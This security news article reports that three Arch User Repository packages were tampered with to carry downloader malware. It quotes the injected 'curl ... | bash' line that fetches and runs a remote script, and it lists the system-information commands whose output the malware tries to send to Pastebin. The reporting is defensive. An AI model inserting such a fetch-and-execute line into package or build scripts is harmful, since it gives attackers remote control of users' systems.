Another Linux community with malware woes

Another day, another Linux community with malware woes.

Last time it was Gentoo, a hard-core, source-based Linux distribution that is popular with techies who like to spend hours tweaking their entire operating sytem and rebuilding all their software from scratch to wring a few percentage points of performance out of it.

That sort of thing isn’t for everyone, but it’s harmless fun and it does give you loads of insight into how everything fits together.

That sets it apart from distros such as ElementaryOS and Mint, which rival and even exceed Windows and macOS for ease of installation and use, but don’t leave you with much of a sense of how it all actually works.

This time, the malware poisoning happened to Arch Linux, another distro we’d characterise as hard-core, though very much more widely used than Gentoo.

Three downloadable software packages in the AUR, short for Arch User Respository, were found to have been rebuilt so they contained what you might (perhaps slightly unkindly) refer to as zombie downloader robot overlord malware.

Bots or zombies are malware programs that call home to fetch instructions from the crooks on what to do next.

The hacked packages were: acroread 9.5.5-8, balz 1.20-3 and minergate 8.1-2; they’ve all apparently been restored to their pre-infection state.

What happened?

Simply put, the packages had one line added – on Linux, the core functionality of a bot can be trivially condensed into a single line:

   curl -s https://[redacted]/~x|bash -&

This single line of code, part of an package creation script written in the Bash language, fetches a text file from a command-and-control (C&C) server and runs it as a script in its own right.

The command curl is a program that fetches a web page using HTTP or HTTPS. The pipe character (|) is Unix shorthand for “use the output of the command on the left directly as the input of the command on the right”. And bash - says to read and use the data that’s coming as input, denoted by the dash (-) directly as a script program. The pipe character therefore means you don’t need to run one command to fetch a file and then tell the next command to read the same file back in – the data is, literally and figuratively, piped between the two programs via memory. Finally, the ampersand (&) means to run the whole thing in the background so that it’s as good as invisible.

This means that the attacker can change the behaviour of the malware at any time by altering the commands stored in the file ~x on the C&C server.

At present, the ~x command sets up a regular background task- the Linux equivalent of a Windows service – that repeatedly runs a second script called that’s downloaded from the web page ~u on the same C&C server.

The file tries to extract some basic data about the infected system, and to upload it to a Pastebin account.

The system data that the malware is interested in comes from the following Arch commands:

 echo ${MACHINE_ID}    -- this computer's unique ID (randomly generated at install time)
 date '+%s'            -- the current date and time
 uname -a              -- details about the Linux version that's loaded
 id                    -- details about the user account running the script
 lscpu                 -- technical details about the system processor chip
 pacman -Qeq           -- the software you've installed (Qe means "query explicit")
 pacman -Qdq           -- any extra software needed to go with it (Qd means "query dependencies")
 systemctl list-units  -- all the system services

Fortunately, the part of the script that does the data exfiltration contains a programming error, so the upload never happens.

The Arch reaction

Arch is well-respected for the enormous quantity of community documentation it has published in recent years – users of many other distros often find themselves referring to Arch Linux documentation pages to learn what they need to know.

Where Arch has been – how can we say this? – a little less likable, is the extent to which the distro’s culture mirrors the aggressive “alpha techiness” of the King of Linux, Linus Torvalds himself – a man who is on record for numerous intolerant, insulting and frequently purposeless outbursts aimed at those he thinks are in the way.

So we weren’t entirely surprised to see this online response from one of the luminati of the Arch community, dismissing the malware with a petulant “meh”:

This would be a warning for what exactly? That orphaned packages can be adopted by anyone? That we have a big bold disclaimer on the front page of the AUR clearly stating that you should use any content at your own risk?

This thread is attracting way more attention than warranted. I’m surprised that this type of silly package takeover and malware introduction doesn’t happen more often.

To be fair to the Arch team, the hacked packages were found on AUR, which is the Arch User Repository, which isn’t vouched for or vetted by the Arch maintainers – in the same sort of way that none of the off-market Android forums are vouched for by Google.

Nevertheless, the AUR site is logoed up and branded as the Arch User Repository, not merely the User Repository, so a bit less attitude from the Arch team wouldn’t hurt.

What to do?

You might not like Arch’s attitude – and if you don’t, you’re probably using a different distro anyway – but the warning on the community-operated Arch User Repository does, in fact, say it all, even if we’d sneak a hyphen between “user” and “produced”:

DISCLAIMER: AUR packages are user produced content. Any use of the provided files is at your own risk.

If you don’t trust it, don’t install it.

Note. We don’t expect this thing to be a problem in real life, but Sophos products will nevertheless detect the abovementioned scripts as Linux/BckDr-RVR, and block the C&C URLs used to “feed” the attack.